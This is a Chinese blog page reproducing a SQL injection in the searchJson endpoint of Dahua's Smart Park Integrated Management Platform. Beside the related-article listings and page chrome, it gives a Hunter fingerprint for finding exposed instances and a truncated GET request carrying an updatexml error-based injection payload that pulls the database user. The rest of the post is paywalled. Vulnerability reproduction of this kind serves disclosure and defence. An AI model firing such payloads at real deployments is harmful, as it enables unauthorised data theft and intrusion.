大华智慧园区综合管理平台searchJson SQL注入漏洞

最新推荐文章于 2024-08-02 18:24:49 发布
最新推荐文章于 2024-08-02 18:24:49 发布
阅读量369 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33331244/article/details/132740270
版权

一、漏洞简介

“大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。

二、影响版本

  • hunterapp.name="Dahua 大华 智慧园区管理平台"
  • 登录页面
    在这里插入图片描述# 四、漏洞复现
GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e
了解本专栏 订阅专栏 解锁全文 超级会员免费看
xiaokp7
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
大华智慧园区综合管理平台SQL注入漏洞复现
0xSec
08-10 2375
大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
漏洞复现】大华智慧园区综合管理平台 searchJson Sql注入漏洞
凝聚力安全团队
07-12 272
大华智慧园区综合管理平台 searchJson Sql注入漏洞大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
漏洞复现】大华智慧园区综合管理平台SQL注入漏洞
晚风不及你
02-21 764
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华智慧园区综合管理平台pageJson接口SQL注入漏洞
weixin_43567873的博客
03-28 44
大华智慧园区综合管理平台pageJson接口SQL注入漏洞
大华智慧园区综合管理平台SQL注入漏洞复现(0day)
08-11 1444
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
大华智慧园区综合管理平台searchJson接口 SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
12-11 388
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。由于该平台searchJson接口未对用户输入数据做限制,攻击者可以直接将恶意代码拼接进SQL查询语句中,导致系统出现SQL注入漏洞
【1day】复现大华智慧园区综合管理平台SQL注入漏洞
记录并分享学习安全的知识点..
08-12 917
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台SQL注入漏洞,远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
大华智慧园区综合管理平台SQL注入漏洞
holyxp的博客
08-11 536
大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。
漏洞复现】大华智慧园区综合管理平台-searchJson-SQL注入漏洞
Nday_Seeker
03-15 381
大华智慧园区综合管理平台`searchJson`接口存在SQL注入漏洞,攻击者可利用该漏洞执行SQL语句,获取系统数据库敏感信息。
DH-DSS-H8900智慧园区综合管理平台
03-01
DH-DSS-H8900 系列是为通用性公共建筑物提供安全和高效管理而打造的智慧园区综合管理平台,通过融合大华在安防和智能化领域的专业经验和前沿技术,集成视频,门禁、报警,停车场,考 勤,访客,可视对讲,信息发布等...
大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞POC合集
02-27
大华智慧园区综合管理平台存在未授权高危漏洞(0Day)及以往漏洞POC合集
DH 软件平台 DH-DSS-H8900S2-B 智慧园区综合管理平台-智慧园区APP业务介绍和配置说明 V3.001.0000000.2(行业).docx
05-18
智慧园区综合管理平台 DH-DSS-H8900S2-B 智慧园区APP业务介绍和配置说明 DH-DSS-H8900S2-B 智慧园区综合管理平台是基于智能化和信息化的园区管理系统,旨在为园区居民和管理者提供一站式的服务平台。该平台通过集成...
智慧园区安全防范一体化管理平台建设综合解决方案.pptx
04-13
智慧园区安全防范一体化管理平台是现代工业园区安全管理的重要组成部分,它旨在通过先进的信息技术和安防设备,构建一个全面、高效、智能的安全防护体系。本方案主要针对智慧园区安全理解、现状、解决方案以及相关...
智慧园区安全防范一体化管理平台建设方案.pptx
04-15
智慧园区安全防范一体化管理平台是现代科技与安全管理的深度融合,旨在提升园区的安全水平,保障生产、生活秩序,保护环境及人员安全。以下是对这一主题的详细解析: 首先,理解智慧园区安全的含义至关重要。智慧...
web安全基础学习
m0_71332744的博客
07-31 445
记录学习的原理,少有实操持续更新
从零开始学习网络安全渗透测试之基础入门篇——(六)网络抓包&全局协议&封包监听&网卡模式&科来&wireshark&PC应用
love6a6的博客
08-02 865
是一种用于捕获和分析网络数据包的技术手段。它能够帮助我们深入了解网络中的数据传输情况,对于网络故障排查、性能优化、安全监测等方面都具有重要意义。网络抓包的工作原理通常是通过将网络接口设置为混杂模式,使其能够接收流经该接口的所有数据包。然后,使用专门的抓包软件或工具对这些数据包进行捕获和存储。为了方便大家使用,作者收集到百度网盘分享学习。链接:https://pan.baidu.com/s/1uKUsQfIlWOxTNPvU8DewKQ?pwd=mf7v提取码:mf7v。
【网络安全】CR/LF注入+Race Condition绕过MFA
等风来
08-02 205
ExaHub(此处为虚拟名称)是一个专为 Exa 编程语言的爱好者和专业人士量身定制的平台。Exa 语言以其出色的速度和性能而闻名,广泛应用于科学计算、机器学习和数据科学等领域。ExaHub 提供了集中式的枢纽,用户可以访问各种资源,协作开展项目,并利用专为 Julia 生态系统定制的工具。CR/LF(回车/换行)注入是一种安全漏洞。CR/LF指的是两个ASCII控制字符的序列:回车(CR,ASCII码13)和换行(LF,ASCII码10)。
汽车网络安全 -- MAC介绍:CMAC与CBC-MAC不能混为一谈
最新发布
认真搞搞汽车MCU
08-02 261
MAC全称Message authentication code,是经过特定算法后产生的一小段数据信息,用于校验某数据的完整性和真实性。在数据传递过程中,可检查其内容是否被更改过,不管更改的原因是来自意外或是蓄意攻击。同时可以作为数据来源的身份验证,确认数据的来源。常见的MAC算法包括CMAC和HMAC。
大华智慧园区综合管理平台rce
08-17
大华智慧园区综合管理平台(RCE)是一种基于大数据和人工智能技术的智慧园区管理解决方案。该平台集成了多个子系统,包括智能安防、能源管理、楼宇自动化、智慧交通等,旨在提供全面的园区管理和优化,促进园区的可持续发展。 RCE平台通过监测和收集园区各个系统的数据,实现了全面的实时监控和管理。例如,通过智能安防子系统,可以对园区内的视频监控和入侵报警进行集中管理和分析,及时发现和应对安全事件。能源管理子系统可以帮助园区实现能源使用的监测和调控,提高能源利用效率,减少能源浪费。楼宇自动化子系统可以实现对园区内各个建筑物的智能控制和设备管理,提高建筑物的舒适度和能源效率。智慧交通子系统则可以优化园区的交通流动性,减少交通堵塞和碰撞事故。 RCE平台还具有数据分析和预测功能,利用大数据和人工智能技术,对园区内各个子系统的数据进行分析和挖掘,提供决策支持和优化方案。例如,可以通过数据分析预测出园区能源的高峰和低谷,从而合理调控能源供应。还可以通过交通数据分析,优化园区的道路规划和交通流量,提高交通效率和安全性。 综上所述,大华智慧园区综合管理平台(RCE)通过集成不同子系统和应用,实现了园区的全面管理和优化,提高了园区的安全性、舒适度和效率。它是未来智慧城市建设的重要组成部分,也是推动城市可持续发展的重要工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaokp7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值